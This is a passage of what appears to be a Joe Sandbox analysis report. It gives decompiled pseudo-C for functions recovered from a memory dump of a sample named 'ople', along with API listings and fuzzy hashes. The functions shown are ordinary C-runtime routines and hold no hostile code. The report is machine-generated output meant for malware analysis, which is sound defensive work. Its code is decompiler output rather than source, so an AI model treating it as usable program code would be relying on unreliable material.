        									_t89 = E00AB9A22(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
        									goto L17;
        								} else {
        									__eflags = _t107;
        									if(_t107 == 0) {
        										_t89 = E00AB96AD(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
        										L17:
        										L15:
        										L28:
        										asm("movsd");
        										asm("movsd");
        										asm("movsd");
        										_t74 = _v40;
        										__eflags = _t74;
        										if(_t74 != 0) {
        											__eflags = _t74 - _v36;
        											L40:
        											L41:
        											return E00AB29BB(_v8 ^ _t128);
        										}
        										_t77 = _v44;
        										__eflags = _t77;
        										if(_t77 == 0) {
        											_t121 = _v52;
        											L34:
        											_t117 = _v28;
        											_t79 =  *((intOrPtr*)(0xac3f60 + _v32 * 4));
        											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040;
        											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) {
        												L37:
        												 *((intOrPtr*)(E00AB501F())) = 0x1c;
        												_t81 = E00AB500C();
        												 *_t81 =  *_t81 & 0x00000000;
        												__eflags =  *_t81;
        												L38:
        												goto L40;
        											}
        											__eflags =  *_t121 - 0x1a;
        											if( *_t121 != 0x1a) {
        												goto L37;
        											}
        											goto L40;
        										}
        										_t126 = 5;
        										__eflags = _t77 - _t126;
        										if(_t77 != _t126) {
        											_t81 = E00AB4FE9(_t77);
        										} else {
        											 *((intOrPtr*)(E00AB501F())) = 9;
        											 *(E00AB500C()) = _t126;
        										}
        										goto L38;
        									}
        									__eflags = _t107 - 1 - 1;
        									if(_t107 - 1 > 1) {
        										goto L34;
        									}
        									E00AB9860( &_v24, _t121, _v12);
        									goto L15;
        								}
        							}
        							 *(E00AB500C()) =  *_t97 & 0x00000000;
        							 *((intOrPtr*)(E00AB501F())) = 0x16;
        							_t81 = E00AB4F63();
        							goto L38;
        						}
        						__eflags = _t107 - 1;
        						if(_t107 != 1) {
        							goto L9;
        						}
        						goto L6;
        					}
        					 *(E00AB500C()) =  *_t99 & _t121;
        					 *((intOrPtr*)(E00AB501F())) = 0x16;
        					E00AB4F63();
        					goto L41;
        				}
        				goto L41;
        			}

        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID:
        • String ID: ]iL
        • API String ID: 0-4085116960
        • Opcode ID: c85bad27c3f82941b0e8200cddfec9ce43876a2e03ad6aba658ebe3e31b52ccb
        • Instruction ID: e0d9bfa0b663a1c242ad2219aeef55133c0ab3a6d446b9e2bcc600b0d1500c54
        • Opcode Fuzzy Hash: c85bad27c3f82941b0e8200cddfec9ce43876a2e03ad6aba658ebe3e31b52ccb
        • Instruction Fuzzy Hash: 52518B71D1020AABDB11EFB9C945BEFBBBCAF09320F140059F605A7293D7719A41DBA1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E00AB42EE(signed int* __ecx, signed int __edx) {
        				signed int _v8;
        				intOrPtr* _v12;
        				signed int _v16;
        				signed int _t28;
        				signed int _t29;
        				intOrPtr _t33;
        				signed int _t37;
        				signed int _t38;
        				signed int _t40;
        				void* _t50;
        				signed int _t56;
        				intOrPtr* _t57;
        				signed int _t68;
        				signed int _t71;
        				signed int _t72;
        				signed int _t74;
        				signed int _t75;
        				signed int _t78;
        				signed int _t80;
        				signed int* _t81;
        				signed int _t85;
        				void* _t86;
        
        				_t72 = __edx;
        				_v12 = __ecx;
        				_t28 =  *__ecx;
        				_t81 =  *_t28;
        				if(_t81 != 0) {
        					_t29 =  *0xac3018; // 0x4c695d09
        					_t56 =  *_t81 ^ _t29;
        					_t78 = _t81[1] ^ _t29;
        					_t83 = _t81[2] ^ _t29;
        					asm("ror edi, cl");
        					asm("ror esi, cl");
        					asm("ror ebx, cl");
        					if(_t78 != _t83) {
        						L14:
        						 *_t78 = E00AB3CF6( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
        						_t33 = E00AB3074(_t56);
        						_t57 = _v12;
        						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
        						_t24 = _t78 + 4; // 0x4
        						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00AB3074(_t24);
        						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00AB3074(_t83);
        						_t37 = 0;
        						L15:
        						return _t37;
        					}
        					_t38 = 0x200;
        					_t85 = _t83 - _t56 >> 2;
        					if(_t85 <= 0x200) {
        						_t38 = _t85;
        					}
        					_t80 = _t38 + _t85;
        					if(_t80 == 0) {
        						_t80 = 0x20;
        					}
        					if(_t80 < _t85) {
        						L9:
        						_push(4);
        						_t80 = _t85 + 4;
        						_push(_t80);
        						_v8 = E00AB731C(_t56);
        						_t40 = E00AB4676(0);
        						_t68 = _v8;
        						_t86 = _t86 + 0x10;
        						if(_t68 != 0) {
        							goto L11;
        						}
        						_t37 = _t40 | 0xffffffff;
        						goto L15;
        					} else {
        						_push(4);
        						_push(_t80);
        						_v8 = E00AB731C(_t56);
        						E00AB4676(0);
        						_t68 = _v8;
        						_t86 = _t86 + 0x10;
        						if(_t68 != 0) {
        							L11:
        							_t56 = _t68;
        							_v8 = _t68 + _t85 * 4;
        							_t83 = _t68 + _t80 * 4;
        							_t78 = _v8;
        							_push(0x20);
        							asm("ror eax, cl");
        							_t71 = _t78;
        							_v16 = 0 ^  *0xac3018;
        							asm("sbb edx, edx");
        							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
        							_v8 = _t74;
        							if(_t74 == 0) {
        								goto L14;
        							}
        							_t75 = _v16;
        							_t50 = 0;
        							do {
        								_t50 = _t50 + 1;
        								 *_t71 = _t75;
        								_t71 = _t71 + 4;
        							} while (_t50 != _v8);
        							goto L14;
        						}
        						goto L9;
        					}
        				}
        				return _t28 | 0xffffffff;
        			}


        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID:
        • String ID: ]iL
        • API String ID: 0-4085116960
        • Opcode ID: f83643daba645c6221c957788f6522e7a0d305e4ebedc4b7b729c2db6fd3bfa2
        • Instruction ID: f27e821ee05486096f77c67556160ab1f50fdfeff465c72d21233ba27aa4724c
        • Opcode Fuzzy Hash: f83643daba645c6221c957788f6522e7a0d305e4ebedc4b7b729c2db6fd3bfa2
        • Instruction Fuzzy Hash: 5741A376A002049BCF24DF78C981A9DB7E9EF89714F154569E515EF393D731AE01CB80
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E00AB9B10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
        				signed int _v8;
        				char _v12;
        				short _v1716;
        				char _v5132;
        				intOrPtr _v5136;
        				long _v5140;
        				void* _v5144;
        				int _v5148;
        				signed int _t31;
        				intOrPtr _t38;
        				signed int* _t41;
        				int _t45;
        				int _t54;
        				signed short* _t59;
        				signed int _t65;
        				signed int _t67;
        				signed short* _t69;
        				intOrPtr* _t72;
        				intOrPtr _t74;
        				signed int _t75;
        
        				E00ABC1B0();
        				_t31 =  *0xac3018; // 0x4c695d09
        				_v8 = _t31 ^ _t75;
        				_t54 = 0;
        				_t72 = _a4;
        				_t59 = _a12;
        				_t69 = _t59;
        				_v5144 =  *((intOrPtr*)( *((intOrPtr*)(0xac3f60 + (_a8 >> 6) * 4)) + 0x18 + (_a8 & 0x0000003f) * 0x30));
        				_t38 = _a16 + _t59;
        				 *_t72 = 0;
        				 *((intOrPtr*)(_t72 + 4)) = 0;
        				_v5136 = _t38;
        				 *((intOrPtr*)(_t72 + 8)) = 0;
        				if(_t59 < _t38) {
        					while(1) {
        						L1:
        						_t74 = _v5136;
        						_t41 =  &_v1716;
        						while(_t69 < _t74) {
        							_t65 =  *_t69 & 0x0000ffff;
        							_t69 =  &(_t69[1]);
        							if(_t65 == 0xa) {
        								_t67 = 0xd;
        								 *_t41 = _t67;
        								_t41 =  &(_t41[0]);
        							}
        							 *_t41 = _t65;
        							_t41 =  &(_t41[0]);
        							if(_t41 <  &_v12) {
        								continue;
        							}
        							break;
        						}
        						_t45 = WideCharToMultiByte(0xfde9, _t54,  &_v1716, _t41 -  &_v1716 >> 1,  &_v5132, 0xd55, _t54, _t54);
        						_t72 = _a4;
        						_v5148 = _t45;
        						if(_t45 == 0) {
        							L11:
        							 *_t72 = GetLastError();
        						} else {
        							while(WriteFile(_v5144,  &(( &_v5132)[_t54]), _t45 - _t54,  &_v5140, 0) != 0) {
        								_t54 = _t54 + _v5140;
        								_t45 = _v5148;
        								if(_t54 < _t45) {
        									continue;
        								} else {
        									 *((intOrPtr*)(_t72 + 4)) = _t69 - _a12;
        									if(_t69 < _v5136) {
        										_t54 = 0;
        										goto L1;
        									}
        								}
        								goto L12;
        							}
        							goto L11;
        						}
        						goto L12;
        					}
        				}
        				L12:
        				return E00AB29BB(_v8 ^ _t75);
        			}


        APIs
        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,00AB9E6F,?,00000000,?), ref: 00AB9BC3
        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00AB9E6F,?,00000000,?,00000000,00000000,?,00000000), ref: 00AB9BF1
        • GetLastError.KERNEL32(?,00AB9E6F,?,00000000,?,00000000,00000000,?,00000000), ref: 00AB9C22
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharErrorFileLastMultiWideWrite
        • String ID: ]iL
        • API String ID: 2456169464-4085116960
        • Opcode ID: d2dd44801dff05f3b67cd4dc3e51fde7733d07b1e696f8094642413328cf77da
        • Instruction ID: 96c90d60ce7e3afc71eb514ad10d7278c58a2a9d3bc1d92e354fbd4baa22e38c
        • Opcode Fuzzy Hash: d2dd44801dff05f3b67cd4dc3e51fde7733d07b1e696f8094642413328cf77da
        • Instruction Fuzzy Hash: 7B316175A002199FDB18DF59DC919EAB7B9EF08310F0445ADEA0AD7251D630AE81CB60
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E00AB62B8(signed int _a4) {
        				signed int _t9;
        				void* _t13;
        				signed int _t15;
        				WCHAR* _t22;
        				signed int _t24;
        				signed int* _t25;
        				void* _t27;
        
        				_t9 = _a4;
        				_t25 = 0xac3e88 + _t9 * 4;
        				_t24 =  *_t25;
        				if(_t24 == 0) {
        					_t22 =  *(0xabdd68 + _t9 * 4);
        					_t27 = LoadLibraryExW(_t22, 0, 0x800);
        					if(_t27 != 0) {
        						L8:
        						 *_t25 = _t27;
        						if( *_t25 != 0) {
        							FreeLibrary(_t27);
        						}
        						_t13 = _t27;
        						L11:
        						return _t13;
        					}
        					_t15 = GetLastError();
        					if(_t15 != 0x57) {
        						_t27 = 0;
        					} else {
        						_t15 = LoadLibraryExW(_t22, _t27, _t27);
        						_t27 = _t15;
        					}
        					if(_t27 != 0) {
        						goto L8;
        					} else {
        						 *_t25 = _t15 | 0xffffffff;
        						_t13 = 0;
        						goto L11;
        					}
        				}
        				_t4 = _t24 + 1; // 0x4c695d0a
        				asm("sbb eax, eax");
        				return  ~_t4 & _t24;
        			}


        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00AB625F,00000000,00000000,00000000,00000000,?,00AB64D0,00000006,FlsSetValue), ref: 00AB62EA
        • GetLastError.KERNEL32(?,00AB625F,00000000,00000000,00000000,00000000,?,00AB64D0,00000006,FlsSetValue,00ABE238,00ABE240,00000000,00000364,?,00AB4D1C), ref: 00AB62F6
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AB625F,00000000,00000000,00000000,00000000,?,00AB64D0,00000006,FlsSetValue,00ABE238,00ABE240,00000000), ref: 00AB6304
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID:
        • API String ID: 3177248105-0
        • Opcode ID: 77a16a289da485f1b61992a8b3dac55f4561072b77d3d469469337f2684ffc41
        • Instruction ID: c2a4ebb920dce991560ae0e801a9394c2eb63feaab0b6c451f69b2a4567d6e55
        • Opcode Fuzzy Hash: 77a16a289da485f1b61992a8b3dac55f4561072b77d3d469469337f2684ffc41
        • Instruction Fuzzy Hash: 15012B32706332ABCB219FB8AC44AD63BDCAF057A0B210620FD0ADB152D724D812C7E0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 72%
        			E00AB4C4A(void* __ebx, void* __ecx, void* __edx) {
        				void* __edi;
        				void* __esi;
        				intOrPtr _t2;
        				void* _t3;
        				void* _t4;
        				intOrPtr _t9;
        				void* _t11;
        				void* _t20;
        				void* _t21;
        				void* _t23;
        				void* _t25;
        				void* _t27;
        				void* _t29;
        				void* _t31;
        				void* _t32;
        				long _t36;
        				long _t37;
        				void* _t40;
        
        				_t29 = __edx;
        				_t23 = __ecx;
        				_t20 = __ebx;
        				_t36 = GetLastError();
        				_t2 =  *0xac3044; // 0x6
        				_t42 = _t2 - 0xffffffff;
        				if(_t2 == 0xffffffff) {
        					L2:
        					_t3 = E00AB479B(_t23, 1, 0x364);
        					_t31 = _t3;
        					_pop(_t25);
        					if(_t31 != 0) {
        						_t4 = E00AB64A9(_t25, _t36, __eflags,  *0xac3044, _t31);
        						__eflags = _t4;
        						if(_t4 != 0) {
        							E00AB4ABC(_t25, _t31, 0xac4164);
        							E00AB4676(0);
        							_t40 = _t40 + 0xc;
        							__eflags = _t31;
        							if(_t31 == 0) {
        								goto L9;
        							} else {
        								goto L8;
        							}
        						} else {
        							_push(_t31);
        							goto L4;
        						}
        					} else {
        						_push(_t3);
        						L4:
        						E00AB4676();
        						_pop(_t25);
        						L9:
        						SetLastError(_t36);
        						E00AB4758(_t20, _t29, _t31, _t36);
        						asm("int3");
        						_push(_t20);
        						_push(_t36);
        						_push(_t31);
        						_t37 = GetLastError();
        						_t21 = 0;
        						_t9 =  *0xac3044; // 0x6
        						_t45 = _t9 - 0xffffffff;
        						if(_t9 == 0xffffffff) {
        							L12:
        							_t32 = E00AB479B(_t25, 1, 0x364);
        							_pop(_t27);
        							if(_t32 != 0) {
        								_t11 = E00AB64A9(_t27, _t37, __eflags,  *0xac3044, _t32);
        								__eflags = _t11;
        								if(_t11 != 0) {
        									E00AB4ABC(_t27, _t32, 0xac4164);
        									E00AB4676(_t21);
        									__eflags = _t32;
        									if(_t32 != 0) {
        										goto L19;
        									} else {
        										goto L18;
        									}
        								} else {
        									_push(_t32);
        									goto L14;
        								}
        							} else {
        								_push(_t21);
        								L14:
        								E00AB4676();
        								L18:
        								SetLastError(_t37);
        							}
        						} else {
        							_t32 = E00AB6453(_t25, _t37, _t45, _t9);
        							if(_t32 != 0) {
        								L19:
        								SetLastError(_t37);
        								_t21 = _t32;
        							} else {
        								goto L12;
        							}
        						}
        						return _t21;
        					}
        				} else {
        					_t31 = E00AB6453(_t23, _t36, _t42, _t2);
        					if(_t31 != 0) {
        						L8:
        						SetLastError(_t36);
        						return _t31;
        					} else {
        						goto L2;
        					}
        				}
        			}


        APIs
        • GetLastError.KERNEL32(?,?,00AB464B,00AC1E70,0000000C,00AB2746), ref: 00AB4C4E
        • SetLastError.KERNEL32(00000000), ref: 00AB4CB6
        • SetLastError.KERNEL32(00000000), ref: 00AB4CC2
        • _abort.LIBCMT ref: 00AB4CC8
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ErrorLast$_abort
        • String ID:
        • API String ID: 88804580-0
        • Opcode ID: 8ebf3028cbc929c269ea01d3bca9669f9725a04cc34bf9426630a8e165f4b99c
        • Instruction ID: a35b511e0197969b76eaa4ec13a15188ccab295f408cc735e0ba557627417b90
        • Opcode Fuzzy Hash: 8ebf3028cbc929c269ea01d3bca9669f9725a04cc34bf9426630a8e165f4b99c
        • Instruction Fuzzy Hash: 43F0283A1056007ACA12B3756F0AFEB2E6D8FCBF30F224218F915962A3FF25C8034060
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00AB2C96() {
        				void* _t4;
        				void* _t8;
        
        				E00AB3315();
        				E00AB32A9();
        				if(E00AB3009() != 0) {
        					_t4 = E00AB2FBB(_t8, __eflags);
        					__eflags = _t4;
        					if(_t4 != 0) {
        						return 1;
        					} else {
        						E00AB3045();
        						goto L1;
        					}
        				} else {
        					L1:
        					return 0;
        				}
        			}


        APIs
        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00AB2C96
        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00AB2C9B
        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00AB2CA0
          • Part of subcall function 00AB3009: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00AB301A
        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00AB2CB5
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
        • String ID:
        • API String ID: 1761009282-0
        • Opcode ID: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
        • Instruction ID: 8d4277f4a2f4a72fb870928ebd46e8bfab04a62e322e92ff7d39847fe4f90da0
        • Opcode Fuzzy Hash: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
        • Instruction Fuzzy Hash: AAC09226010289A42C603BB22B073FE2B6C0EA37C4B9015C7FD512B02BDD0B070A6333
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E00AB5A7A(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
        				signed int _v8;
        				char _v22;
        				struct _cpinfo _v28;
        				signed int _v32;
        				signed int _v36;
        				signed int _t48;
        				int _t51;
        				signed int _t54;
        				signed int _t55;
        				short _t58;
        				signed char _t62;
        				signed int _t63;
        				signed char* _t72;
        				signed char* _t73;
        				int _t78;
        				signed int _t81;
        				signed char* _t82;
        				short* _t83;
        				int _t87;
        				signed char _t88;
        				signed int _t89;
        				signed int _t91;
        				signed int _t92;
        				int _t94;
        				int _t95;
        				intOrPtr _t98;
        				signed int _t99;
        
        				_t48 =  *0xac3018; // 0x4c695d09
        				_v8 = _t48 ^ _t99;
        				_t98 = _a8;
        				_t78 = E00AB564D(__eflags, _a4);
        				if(_t78 != 0) {
        					_t94 = 0;
        					__eflags = 0;
        					_t81 = 0;
        					_t51 = 0;
        					_v32 = 0;
        					while(1) {
        						__eflags =  *((intOrPtr*)(_t51 + 0xac3058)) - _t78;
        						if( *((intOrPtr*)(_t51 + 0xac3058)) == _t78) {
        							break;
        						}
        						_t81 = _t81 + 1;
        						_t51 = _t51 + 0x30;
        						_v32 = _t81;
        						__eflags = _t51 - 0xf0;
        						if(_t51 < 0xf0) {
        							continue;
        						} else {
        							__eflags = _t78 - 0xfde8;
        							if(_t78 == 0xfde8) {
        								L23:
        							} else {
        								__eflags = _t78 - 0xfde9;
        								if(_t78 == 0xfde9) {
        									goto L23;
        								} else {
        									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
        									__eflags = _t51;
        									if(_t51 == 0) {
        										goto L23;
        									} else {
        										_t51 = GetCPInfo(_t78,  &_v28);
        										__eflags = _t51;
        										if(_t51 == 0) {
        											__eflags =  *0xac3d3c - _t94; // 0x0
        											if(__eflags == 0) {
        												goto L23;
        											} else {
        												E00AB56C0(_t98);
        												goto L37;
        											}
        										} else {
        											E00AB2CE0(_t94, _t98 + 0x18, _t94, 0x101);
        											 *(_t98 + 4) = _t78;
        											 *(_t98 + 0x21c) = _t94;
        											_t78 = 1;
        											__eflags = _v28 - 1;
        											if(_v28 <= 1) {
        												 *(_t98 + 8) = _t94;
        											} else {
        												__eflags = _v22;
        												_t72 =  &_v22;
        												if(_v22 != 0) {
        													while(1) {
        														_t88 = _t72[1];
        														__eflags = _t88;
        														if(_t88 == 0) {
        															goto L16;
        														}
        														_t91 = _t88 & 0x000000ff;
        														_t89 =  *_t72 & 0x000000ff;
        														while(1) {
        															__eflags = _t89 - _t91;
        															if(_t89 > _t91) {
        																break;
        															}
        															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
        															_t89 = _t89 + 1;
        															__eflags = _t89;
        														}
        														_t72 =  &(_t72[2]);
        														__eflags =  *_t72;
        														if( *_t72 != 0) {
        															continue;
        														}
        														goto L16;
        													}
        												}
        												L16:
        												_t73 = _t98 + 0x1a;
        												_t87 = 0xfe;
        												do {
        													 *_t73 =  *_t73 | 0x00000008;
        													_t73 =  &(_t73[1]);
        													_t87 = _t87 - 1;
        													__eflags = _t87;
        												} while (_t87 != 0);
        												 *(_t98 + 0x21c) = E00AB560F( *(_t98 + 4));
        												 *(_t98 + 8) = _t78;
        											}
        											_t95 = _t98 + 0xc;
        											asm("stosd");
        											asm("stosd");
        											asm("stosd");
        											L36:
        											E00AB5725(_t78, _t91, _t95, _t98, _t98);
        											L37:
        											__eflags = 0;
        										}
        									}
        								}
        							}
        						}
        						goto L39;
        					}
        					E00AB2CE0(_t94, _t98 + 0x18, _t94, 0x101);
        					_t54 = _v32 * 0x30;
        					__eflags = _t54;
        					_v36 = _t54;
        					_t55 = _t54 + 0xac3068;
        					_v32 = _t55;
        					do {
        						__eflags =  *_t55;
        						_t82 = _t55;
        						if( *_t55 != 0) {
        							while(1) {
        								_t62 = _t82[1];
        								__eflags = _t62;
        								if(_t62 == 0) {
        									break;
        								}
        								_t92 =  *_t82 & 0x000000ff;
        								_t63 = _t62 & 0x000000ff;
        								while(1) {
        									__eflags = _t92 - _t63;
        									if(_t92 > _t63) {
        										break;
        									}
        									__eflags = _t92 - 0x100;
        									if(_t92 < 0x100) {
        										_t31 = _t94 + 0xac3050; // 0x8040201
        										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
        										_t92 = _t92 + 1;
        										__eflags = _t92;
        										_t63 = _t82[1] & 0x000000ff;
        										continue;
        									}
        									break;
        								}
        								_t82 =  &(_t82[2]);
        								__eflags =  *_t82;
        								if( *_t82 != 0) {
        									continue;
        								}
        								break;
        							}
        							_t55 = _v32;
        						}
        						_t94 = _t94 + 1;
        						_t55 = _t55 + 8;
        						_v32 = _t55;
        						__eflags = _t94 - 4;
        					} while (_t94 < 4);
        					 *(_t98 + 4) = _t78;
        					 *(_t98 + 8) = 1;
        					 *(_t98 + 0x21c) = E00AB560F(_t78);
        					_t83 = _t98 + 0xc;
        					_t91 = _v36 + 0xac305c;
        					_t95 = 6;
        					do {
        						_t58 =  *_t91;
        						_t91 = _t91 + 2;
        						 *_t83 = _t58;
        						_t83 = _t83 + 2;
        						_t95 = _t95 - 1;
        						__eflags = _t95;
        					} while (_t95 != 0);
        					goto L36;
        				} else {
        					E00AB56C0(_t98);
        				}
        				L39:
        				return E00AB29BB(_v8 ^ _t99);
        			}

        APIs
          • Part of subcall function 00AB564D: GetOEMCP.KERNEL32(00000000,?,?,00AB58D6,?), ref: 00AB5678
        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00AB591B,?,00000000), ref: 00AB5AEE
        • GetCPInfo.KERNEL32(00000000,00AB591B,?,?,?,00AB591B,?,00000000), ref: 00AB5B01
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: CodeInfoPageValid
        • String ID: ]iL
        • API String ID: 546120528-4085116960
        • Opcode ID: 5830399fa533155fb2a3f6973bcce9061dcf7f8e60001f0dcf9cbda83ae631ef
        • Instruction ID: 7835ab562b1ea8f809c0e6db0978697d506f7e8e4c8ecdf323a375747eafef03
        • Opcode Fuzzy Hash: 5830399fa533155fb2a3f6973bcce9061dcf7f8e60001f0dcf9cbda83ae631ef
        • Instruction Fuzzy Hash: 56513271E00B459EDB259F71C891BFABBFDEF42300F18446ED0868B253E6359942CB90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E00AB5725(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
        				signed int _v8;
        				char _v264;
        				char _v520;
        				char _v776;
        				char _v1800;
        				char _v1814;
        				struct _cpinfo _v1820;
        				intOrPtr _v1824;
        				signed int _v1828;
        				signed int _t63;
        				void* _t67;
        				signed int _t68;
        				intOrPtr _t69;
        				void* _t72;
        				char _t73;
        				char _t74;
        				signed char _t75;
        				signed int _t76;
        				signed char _t86;
        				char _t87;
        				char _t90;
        				signed int _t93;
        				signed int _t94;
        				signed int _t95;
        				void* _t96;
        				char* _t97;
        				intOrPtr _t101;
        				signed int _t102;
        
        				_t95 = __edx;
        				_t63 =  *0xac3018; // 0x4c695d09
        				_v8 = _t63 ^ _t102;
        				_t101 = _a4;
        				_t4 = _t101 + 4; // 0x5efc4d8b
        				if(GetCPInfo( *_t4,  &_v1820) == 0) {
        					_t47 = _t101 + 0x119; // 0xab5d70
        					_t96 = _t47;
        					_t90 = 0;
        					_t67 = 0xffffff9f;
        					_t68 = _t67 - _t96;
        					__eflags = _t68;
        					_v1828 = _t68;
        					do {
        						_t97 = _t96 + _t90;
        						_t69 = _t68 + _t97;
        						_v1824 = _t69;
        						__eflags = _t69 + 0x20 - 0x19;
        						if(_t69 + 0x20 > 0x19) {
        							__eflags = _v1824 - 0x19;
        							if(_v1824 > 0x19) {
        								 *_t97 = 0;
        							} else {
        								_t72 = _t101 + _t90;
        								_t57 = _t72 + 0x19;
        								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
        								__eflags =  *_t57;
        								_t59 = _t90 - 0x20; // -32
